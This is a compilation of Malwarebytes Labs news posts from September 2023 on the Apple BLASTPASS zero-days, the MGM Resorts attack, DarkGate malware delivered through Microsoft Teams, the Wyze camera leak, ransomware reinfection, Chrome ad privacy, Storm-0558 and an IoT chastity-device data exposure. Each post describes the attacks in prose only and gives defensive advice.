IT News

The Cybersecurity & Infrastructure Security Agency (CISA) has added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. This means that Federal Civilian Executive Branch (FCEB) agencies need to remediate this vulnerability by October 2, 2023 in order to protect their devices against active threats. We urge everyone else to take these seriously too.

Apple released security updates for several products to address these vulnerabilities on September 7, 2023.

An overview of the updates that are available at the time of writing:

The updates may already have reached you in your regular update routines, but it doesn’t hurt to check if your device is at the latest update level. If a Safari update is available for your device, you can get it by updating or upgrading macOS, iOS, or iPadOS.

How to update your iPhone or iPad.

How to update macOS on Mac.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVEs added to the Catalog of Known Exploited Vulnerabilities are:

CVE-2023-41064: A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.6.9, macOS Big Sur 11.7.10, macOS Ventura 13.5.2, iOS 16.6.1 and iPadOS 16.6.1, iOS 15.7.9 and iPadOS 15.7.9. Processing a maliciously crafted image may lead to arbitrary code execution.

A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap.

The heap is an area of memory made available use by the program. The program can request blocks of memory for its use within the heap. In order to allocate a block of some size, the program makes an explicit request by calling the heap allocation operation.

CVE-2023-41061: A validation issue was addressed with improved logic. This issue is fixed in watchOS 9.6.2, iOS 16.6.1 and iPadOS 16.6.1. A maliciously crafted attachment may result in arbitrary code execution.

At the time of the patches being released, Apple said it was aware of a report that these issues may have been actively exploited.

The vulnerabilities were discovered as zero-days by CitizenLab, while checking the device of an individual employed by a Washington DC-based civil society organization with international offices. Together, these two vulnerabilities were found to be used in an attack chain dubbed BLASTPASS. The exploit chain was capable of compromising iPhones running the latest version of iOS (16.6) without any interaction from the victim and was reportedly used by the NSO Group to deliver the Pegasus spyware.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

A major incident impacting MGM Resorts has caused computer shutdowns all over the US. The systems most impacted are tied to casinos and hotel computer systems. According to the AP, locations caught by this shutdown range from New York and Ohio to Michigan and Mississippi.

At this point I’d link to the post on the company website explaining what’s occurred but at time of writing, the site tends to not load properly which is probably due to heavy traffic. When it does, it simply says that the MGM Resorts website is currently unavailable and gives visitors a list of contact numbers. AP also mentions that other MGM websites have been replaced with “back soon” style pages while the clean up from the attack is no doubt still ongoing.

At present, what’s available is a selection of posts made to X (formerly Twitter) giving brief details of the incident.

This is what MGM Resorts has to say on the matter:

MGM Resorts recently identified a cybersecurity issue affecting some of the company’s systems. Promptly after detecting the issue, we quickly began an investigation with assistance from leading external cybersecurity experts.  We also notified law enforcement and took prompt action to protect our systems and data, including shutting down certain systems. Our investigation is ongoing, and we are working diligently to determine the nature and scope of the matter.

pic.twitter.com/nxIweGInsB

— MGM Resorts (@MGMResortsIntl) September 11, 2023

MGM goes on to say that “resorts are fully operational”. Meanwhile, BBC reporter Joe Tidy reports that slot machines and casino floors were left empty, and that physical room keys had to be distributed. An additional admin error caused a guest to walk in on someone else. Clearly things are not going swimmingly for MGM Resorts.

Scene in MGM Grand according to a TikTok user who said slots machines down and casino floor empty after cyber attack. She also says staff had to make and distribute physical room keys and an admin error caused her to walk in on another guest. Source: https://t.co/etNWW0S49y pic.twitter.com/ZgYkv1fD58

— Joe Tidy (@joetidy) September 12, 2023

Some systems are slowly coming back to life, but there’s no estimate for when full functionality will be restored. The initial fallout of the attack seems to have been the worst of it, with reports of “thousands” of guests locked out of their rooms.

In terms of what the attack could mean for guests, it’s too early to say. MGM has not touched on whether or not customer data has been breached or exfiltrated, and if the culprit is ransomware this could rumble on for days or weeks. Nobody wants to think about their personal data being wrapped up and dropped onto a data dump website, but as with all these incidents it is a distinct possibility. Unverified sources are claiming this to be the case, but we would suggest sticking to official sources only.

If you’re a guest at an MGM resort, don’t panic. Keep note of the contact numbers, and ask staff what the process is for keeping you informed of any breaking developments. An abundance of caution would suggest monitoring credit and debit card payments for a little while, along with watching out for any MGM themed emails. If you do receive the latter, go back to an official point of contact and verify its authenticity. Sometimes organisations send out emails which are genuine, but look suspicious. It’s always better to check.

If this attack does prove to be ransomware, the next development we hear about could be the attackers announcing a data dump or additional demands. For the time being, don’t panic and try to enjoy your resort time as best as you can given the unusual circumstances.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Researchers have found a new method by which cybercriminals are spreading the DarkGate Loader malware. Until now, DarkGate was typically distributed via phishing emails. The malspam campaign used stolen email threads to lure victims into clicking a hyperlink, which downloaded the malware. But Malwarebytes also found DarkGate reloaded via malvertising and SEO poisoning campaigns.

A cybercriminal who goes by the handle RastaFarEye has been advertising DarkGate Loader on cybercrime forums since June 16, 2023. Once active, the malware can be used for several malicious activities like remote access, cryptocurrency mining, keylogging, clipboard stealing, and information stealing.

What’s new is that the researchers found evidence of a campaign using Microsoft Teams to deliver the DarkGate Loader.

“On August 29, in the timespan from 11:25 to 12:25 UTC, Microsoft Teams chat messages were sent from two external Office 365 accounts compromised prior to the campaign. The message content aimed to social engineer the recipients into downloading and opening a malicious file hosted remotely.”

The distributed link initially points to a traffic distribution system (TDS). If the requirements set by the attacker are met, the TDS will redirect the victim user to the final payload URL for the MSI download. When the user opens the downloaded MSI file, the DarkGate infection is triggered.

The download locations observed in the Teams attacks were sharepoint.com URLs hosting .zip files with names like “Changes to the vacation schedule.zip.”  The ZIP file contains a malicious LNK file (shortcut) posing as a PDF document: “Changes to the vacation schedule.pdf.lnk.”

Clicking the shortcut executes a command line which triggers the download and execution of a renamed cURL (a command-line tool for getting or sending data including files using URL syntax) to download and execute Autoit3.exe and a bundled script. The pre-compiled AutoIT script hides the code in the middle of the file and, on execution, drops a new file that contains shellcode.

When the shellcode is run, the first thing it uses is the “byte by byte” technique aka called stacked strings, to create a new file: a Windows executable identified as DarkGate Loader.

Protection

Current Microsoft Teams security features such as Safe Attachments or Safe Links failed to detect or block this attack. BleepingComputer reported in June of 2023 that security researchers had found a simple way to deliver malware to an organization with Microsoft Teams, despite restrictions in the application for files from external sources. Microsoft Teams has client-side protections in place to block file delivery from external tenant accounts. But the restriction can be circumvented by changing the internal and external recipient ID in the POST request of a message, which ends up with Teams treating an external user as if it was an internal one.

The only way to prevent this attack vector within Microsoft Teams is to only allow Microsoft Teams chat requests from specific external domains. This may be troublesome in some environments since this means that all trusted external domains need to be whitelisted by an IT administrator.

Malwarebytes customers are protected against this attack as Malwarebytes blocks the C2 server hosting the downloaded files. Malwarebytes detects the LNK file and the scripts as Trojan.DarkGate.

Malwarebytes blocks 5.188.87.58

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

This week on the Lock and Code podcast…

In 2022, Malwarebytes investigated the blurry, shifting idea of “identity” on the internet, and how online identities are not only shaped by the people behind them, but also inherited by the internet’s youngest users, children. Children have always inherited some of their identities from their parents—consider that two of the largest indicators for political and religious affiliation in the US are, no surprise, the political and religious affiliations of someone’s parents—but the transfer of online identity poses unique risks.  

When parents create email accounts for their kids, do they also teach their children about strong passwords? When parents post photos of their children online, do they also teach their children about the safest ways to post photos of themselves and others? When parents create a Netflix viewing profile on a child’s iPad, are they prepared for what else a child might see online? Are parents certain that a kid is ready to watch before they can walk?

Those types of questions drove a joint report that Malwarebytes published last year, based on a survey of 2,000 people in North America. That research showed that, broadly, not enough children and teenagers trust their parents to support them online, and not enough parents know exactly how to give the support their children need.

But stats and figures can only tell so much of the story, which is why last year, Lock and Code host David Ruiz spoke with a Bay Area high school graduate about her own thoughts on the difficulties of growing up online. Lock and Code is re-airing that episode this week because, in less than one month, Malwarebytes is releasing a follow-on report about behaviors, beliefs, and blunders in online privacy and cybersecurity. And as part of that follow-on report, Lock and Code is speaking again with the guest brought on last year, Nitya Sharma. 

Before our follow-on report releases, we are sharing with listeners our prior episode that aired in 2022 about the difficulties that an everyday teenager faces online, including managing her time online, trying to meet friends and complete homework, the traps of trading online interaction with in-person socializing, and what she would do differently with her children, if she ever started a family, in preparing them for the Internet.

Tune in today. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use. 

Show notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Last week on Malwarebytes Labs:

• Supply chain related security risks, and how to protect against them
• Password-stealing Chrome extension smuggled on to Web Store
• Smart chastity device exposes sensitive user data
• X wants your biometric data
• Mac users targeted in new malvertising campaign delivering Atomic Stealer
• A history of ransomware: How did it get this far?
• FreeWorld ransomware attacks MSSQL—get your databases off the internet
• How Microsoft’s highly secure environment was breached
• Chrome’s “Enhanced Ad Privacy”: What you need to know

Stay safe!

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

A mishap has resulted in security feeds and camera logs from home cameras being temporarily visible online. Users of Wyze, makers of smart products and home cameras, fell victim to this bizarre incident sometime around September 8.

One of the first posts about this appeared on Reddit, where a user highlighted that they were “seeing someone else’s webcam feed”. They’d logged onto the website to check their cameras and were met with someone else’s dog in someone else’s house. It didn’t take long before other people started reporting the same thing.

Here’s a bedroom, and (disturbingly) another Reddit user claiming to have seen people naked. While there’s no way to prove the latter claim, being able to view bedrooms and other spots around the house does at least make it a possibility.

As far as home cameras go, this is absolutely up there at the top of the “things you don’t want to happen” list. 

These were visible on the service’s web view located at view(dot)wyze(dot)com. According to a Wyze spokesperson, this situation was live for “about 30 minutes” and that roughly ten users had their cameras visible online.

While there is no detailed additional information with regard to the specifics, Mashable notes that one Reddit user claims the cause was due to webpages being cached while on the viewer site then potentially shared with others. Wyze then confirmed to Mashable that the feed mashup did indeed originate from a “web caching issue”.

If you’re curious, the official Wyze rundown reads as follows. It does not go into more detail than what’s already been revealed above:

This was a web caching issue and is now resolved. For about 30 minutes this afternoon, a small number of users who used a web browser to log in to their camera on view(dot)wyze(dot)com may have seen cameras of other users who also may have logged in through view(dot)wyze(dot)com during that time frame. The issue DID NOT affect the Wyze app or users that did not log in to view(dot)wyze(dot)com during that time period.

Once we identified the issue we shut down view(dot)wyze(dot)com for about an hour to investigate and fix the issue.

This experience does not reflect our commitment to users or the investments we’ve made over the last few years to enhance security. We are continuing to investigate this issue and will make efforts to ensure it doesn’t happen again. We’re also working to identify affected users.

We will let you know if there are any further updates.

If nothing else, it’s good news that no more feeds should be accidentally loaded up while checking your own Wyze viewing area. Having said that, this is a shockingly poor thing to have happened. We may simply never know for sure who was viewed, or what they may have been doing at the time.

If you have smart cameras in and around your home, it might be a good idea to check your settings. I’ve known people who’ve bought smart cameras and had no idea there was any sort of web or cloud based functionality. Not everything is local!

If you’re in your property when the cameras are running, what happened to those Wyze users is probably not going to happen to you. Even so, you may wish to revisit your setup. Consider turning off video and audio, or disabling any web-based feed. You can probably still record locally if you need to, or at least come to a privacy-focused setting which meets your needs. On the off chance that your equipment settings don’t fit with your expectations, you may need to be in the market for a new smart security system.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

A few months ago, we wrote about a ransomware reinfection incident. Ransomware reinfection arguably could be even worse than being a first time victim. Unfortunately it happens more often than you may think.

Research shows that in 2022, more than a third (38%) of surveyed organizations fell victim to a repeat ransomware attack. This means that they were hit twice or more, either by the same or by different ransomware attackers.

Even paying the first time is not much help. A 2022 study found that 80% of companies that paid a ransom were hit again at a later time. Among those, 40% paid up a second time, with 70% of those companies paying a higher amount than they did after the first attack.

The most common reasons for reinfection are:

• backdoors left behind by the criminals
• credentials stolen in the course of the first attack
• unpatched vulnerabilities
• restoration of infected backups

In some ransomware attacks criminals have access to the target network for weeks or months, giving them ample opportunity to open a backdoor or otherwise retain the necessary controls and permissions to return and trigger another attack. Another likely option to consider is that exploitation of a vulnerable network device may provided criminals with login credentials they can use to come right back even if the vulnerability has been patched.

Every chain has a weakest link, but when one breaks it’s important to replace it with a stronger one. Vulnerable devices, services, and software either need to get patched or, when possible, should be stopped from being internet facing. If those are not viable options, it’s time to consider what’s cheaper. Replacing it by something more secure, or go through another ransomware attack. Other options are very strict access policies to limit the attackers’ options, network segmentation to limit the possible damage, and constant active monitoring to get an alert at the first sign of trouble. These options should not be treated as a “pick one” but should be fully deployed where possible.

Knowing the weakest link and figuring out what information the criminals may have obtained is why it’s important to conduct a full forensic examination after an incident. It is necessary to address the vulnerability that the criminals used to get in, any backdoors they may have left behind, and change credentials that may have been stolen.

Having recent actionable backups is important to limit the disruption caused by the incident. But recent backups do come with the risk of containing parts of the infection or backdoors, which is another reason why a forensic investigation is important. Once you have pinpointed the time of the initial breach, you can rule out restoring any files that were left behind by the attackers.

Not only does a thorough forensic investigation help you find the cause that might be remediated, it’s important to be able to follow the tracks the attacker left in your network, so you can reconstruct what access they may have gained and what they may have copied, left behind, changed, or deleted.

To be able to perform an effective forensic investigation you need reliable logs, and preferably ones that are easy to interpret. Something to keep in mind when you’re shopping for an EDR or SIEM solution.

How to avoid ransomware

• Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
• Prevent intrusions. Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
• Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
• Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
• Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
• Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Users of Google’s Chrome web browser may wish to dig into their privacy settings as a new feature regarding advertising privacy slowly rolls out to the masses.

Google’s “Enhanced Ad Privacy” feature may soon appear in your browser, tied to choices regarding a new Chrome feature named Topics. This is one of several potential replacements for the increasingly outdated concept of third-party tracking cookies. However, there is a catch. Only a “small percentage” of Chrome users have so far seen the Ad Privacy popup, so it may not be something you experience yourself for some time to come. When it does arrive, however, you’ll need to know exactly what’s on offer with regard to the options provided.

It’s no secret that most major browsers are getting rid of third-party tracking cookies. Users don’t want a random collection of cookies on their systems contributing to a build up of shadowy profiles trailing them around the web.

Chrome has previously had to delay plans to sunset these kinds of cookies in the browser. Throughout this, there was an understanding that none of these products would scrap advertising entirely. It’s one of the main sources of revenue for any would-be internet giant.

In this case, Google has been coming up with several potential replacements. The primary driver for possible ad revenue is likely to be Topics. This is intended to replace the old way of doing things, enabling interest-based advertising minus the site visit tracking. The intention is for websites to ask Chrome what the user likes through the Topics JavaScript API, and then serve relevant ads with no cookie involvement.

Chrome selects these potential topics of interest by studying the user’s browser history. Essentially, if you visit a lot of sports websites then a site you’re on which queries the Topics API can be reasonably expected to come away with “sports” as one of your Topics. At this point, you’ll probably be seeing a lot of sports based adverts in your immediate browsing future.

This is where the Enhanced Ad Privacy feature comes into play. With the advent of Chrome 115, certain users have been seeing popups regarding these changes with regard to privacy settings. It makes sense to give users control over this functionality, and so the popup says the following:

We’re launching new privacy features that give you more choice over the ads you see. Chrome notes topics of interest based on your recent browsing history. Also, sites you visit can determine what you like. Later, sites can ask for this information to show you personalised ads. You can choose which topics and sites are used to show you ads.

To measure the performance of an ad, limited types of data are shared between sites such as the time of day an ad was shown to you.

If you want to opt-out of this new functionality, The Register reports that you need to click into settings and take appropriate steps to disable it. Some online circles are not enthused due to the “Got it” confirmation button at the bottom of the popup. This is because “Got it” may suggest that a new privacy feature has launched and has immediately disabled or reduced something, not signed you up to it.

In other words, if you do not want any part of the Topics API system, you need to click the settings link when faced with the popup and set about turning it all off. Compare and contrast with other versions of this popup, which say “No Thanks” and “Turn it on” instead of “Got it” and “Settings”.

Clearly this isn’t ideal, though as The Register notes, legal requirements in different regions mean some folks will experience an opt-in system and others will be opted-out. It’s entirely possible a lot of people out there may end up with it switched on when they want it off, and vice-versa. You can visit chrome://setings/adPrivacy in your Chrome browser to see if you have this enabled, along with several other relevant settings including topics you’ve blocked and links to cookie, and site-suggested ads settings.

Users of Malwarebytes Browser Guard are protected from sites reading your Google Topics.

An investigation by Microsoft has finally revealed how China-based hackers circumvented the protections of a “highly isolated and restricted production environment” in May 2023 to unlock sensitive email accounts belonging to US government agencies.

The attack was first reported by Microsoft in July, in an article that left some important questions unanswered. The original article revealed that China-based hackers—dubbed Storm-0558 in accordance with Microsoft’s new threat actor naming scheme—had gained access to email accounts “affecting approximately 25 organizations in the public cloud including government agencies as well as related consumer accounts of individuals likely associated with these organizations.” Ars Technica describes those government accounts as “belonging to the US Departments of State and Commerce.”

The accounts, Microsoft says, were accessed using forged authentication tokens:

Microsoft investigations determined that Storm-0558 gained access to customer email accounts using Outlook Web Access in Exchange Online (OWA) and Outlook.com by forging authentication tokens to access user email. 

Authentication tokens are the computer equivalent of the wristband you get at a concert, or the lanyard you’re issued at a cybersecurity conference. You show your ticket once, and in return you’re given a wrist band or lanyard that you have to keep on display at all times to show you belong.

In the case of Outlook.com, your username and password are the ticket that gets you through the door, and the authentication token is the lanyard you’re given that says you’re allowed to be there.

An attacker with your authentication token can pretend to be you without knowing your password, so tokens need to be hard to forge. To ensure they are, they’re backed by cryptography that hinges on a private cryptographic key that has to be kept very, very, very secure indeed.

The original Microsoft article noted that Storm-0558 “used an acquired [Microsoft account] key to forge tokens to access OWA and Outlook.com” but, crucially, did not say how the attackers were able to get at a key that would have been held in something like a real life version of the Fort Knox-like production environment, described by Microsoft as follows:

Microsoft maintains a highly isolated and restricted production environment. Controls for Microsoft employee access to production infrastructure include background checks, dedicated accounts, secure access workstations, and multi-factor authentication using hardware token devices. Controls in this environment also prevent the use of email, conferencing, web research and other collaboration tools which can lead to common account compromise vectors such as malware infections or phishing, as well as restricting access to systems and data using Just in Time and Just Enough Access policies.

Microsoft provides an answer—what it calls the “most probable mechanism”—to the riddle of how attackers breached all that protection, in its September 6 update.

It starts with a crash in a consumer signing system in 2021. A “crash dump” of the system, which included the key, was moved from the highly secure production environment into Microsoft’s debugging environment so that the cause of the crash could be investigated.

At some point after this occurred, Storm-0558 compromised a Microsoft engineer’s corporate account. That account had access to the debugging environment containing the crash dump with the key, and Storm-0558 was able to retrieve it from there without having to tackle the extensive security of the production environment.

Crucially, mechanisms that should have redacted the key material during the crash dump failed.

As you’d expect, Microsoft explains that it’s gone to great pains to beef up its security as a result, with numerous improvements in the way it handles and detects key materials, among other improvements.

The attack is a great example of just how advanced and persistent Advanced Persistent Threat (APT) actors can be, and why what Microsoft calls an “‘assume breach’ mindset” is so important in modern security. Computer networks are complicated and constantly in flux, and any organization can be breached. Assume you have been breached and monitor your environment accordingly.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

A security breach or piece of inadvertent exposure can be a devastating thing, not just for the company impacted but also the people whose data is stolen or exposed to the world. The usual roll-call of “name, address, phone number and card details” is bad enough. If such things are tied to sensitive material or websites, it can be many times worse.

This is the case for a recent piece of Internet of Things technology tied to people’s love lives. TechCrunch reports that a wearable “chastity device” which allows the user’s partner to control it over the internet (via Android app) has exposed all manner of user details which includes:

• Home addresses
• IP addresses
• Plaintext passwords
• Email addresses
• GPS coordinates

The researcher who discovered the issue claims it’s due to “several flaws” in the servers being used by the company behind the device. Two vulnerabilities were how the researcher was able to view no fewer than 10,000 user records. Despite contacting the organisation responsible on June 17, there’s been no word back and the issue is still out there.

Due to this potentially snowballing in a much worse way if the device name is made public, the details are so far being kept under wraps. As a result, if you use an internet connected chastity cage with your partner you won’t know for sure if you’re potentially affected or not.

At this point the story would unusually end, and we’d advise you to think carefully when using IoT devices tied to more private aspects of your life. Well, not just yet! As it happens, the researcher was so frustrated by the lack of response that they took to compromising the device’s website with the following message:

The site was disabled by a benevolent third party. [REDACTED] has left the site wide open, allowing any script kiddie to grab any and all customer information. This includes plaintext passwords and contrary to what [REDACTED] has claimed, also shipping addresses. You’re welcome!” the researcher wrote. “If you have paid for a physical unit and now cannot use it, I’m sorry. But there are thousands of people with accounts on here and I could not in good faith leave everything up for grabs.

We can’t condone breaking into a website and while trying to warn people is commendable, doing it in this fashion is likely to lead to more problems. If you want to keep a lid on the issue and not have it spill out across the internet, nothing can make something go public quicker than a spectacular web page defacement.

In this case, it doesn’t seem to have happened (yet). Even so, the message was gone a day later and the issue which led the researcher to so many user details still exists.

The above is bad enough. PayPal payment logs being exposed is possibly even worse, tying payments to email addresses. All of this alongside the GPS details for some users makes public activities that some folks will find embarrassing and not for public consumption. In specific circumstances this kind of thing can lead to harassment, trolling, and more.

With this in mind, we suggest an abundance of caution when making use of devices and technology similar to the above.

A product with no internet connection is safer from a data exposure perspective, but will naturally be somewhat less functional. If you need to make payments, use anonymous emails set up for exclusive use with sensitive devices. And keep in mind that enabling features like GPS will give potentially pinpoint accuracy to your daily movements.

We can only hope that the flaws in the above device are patched as soon as possible, but it’s possible that nothing will ever be done about it. While it should be quite shocking that such a personal device is able to be exploited in this way, IoT has been a flashpoint of poor security practices and lack of responsibility for years now. Buyer most definitely beware.

We don’t just report on threats—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your Android devices by downloading Malwarebytes for Android today.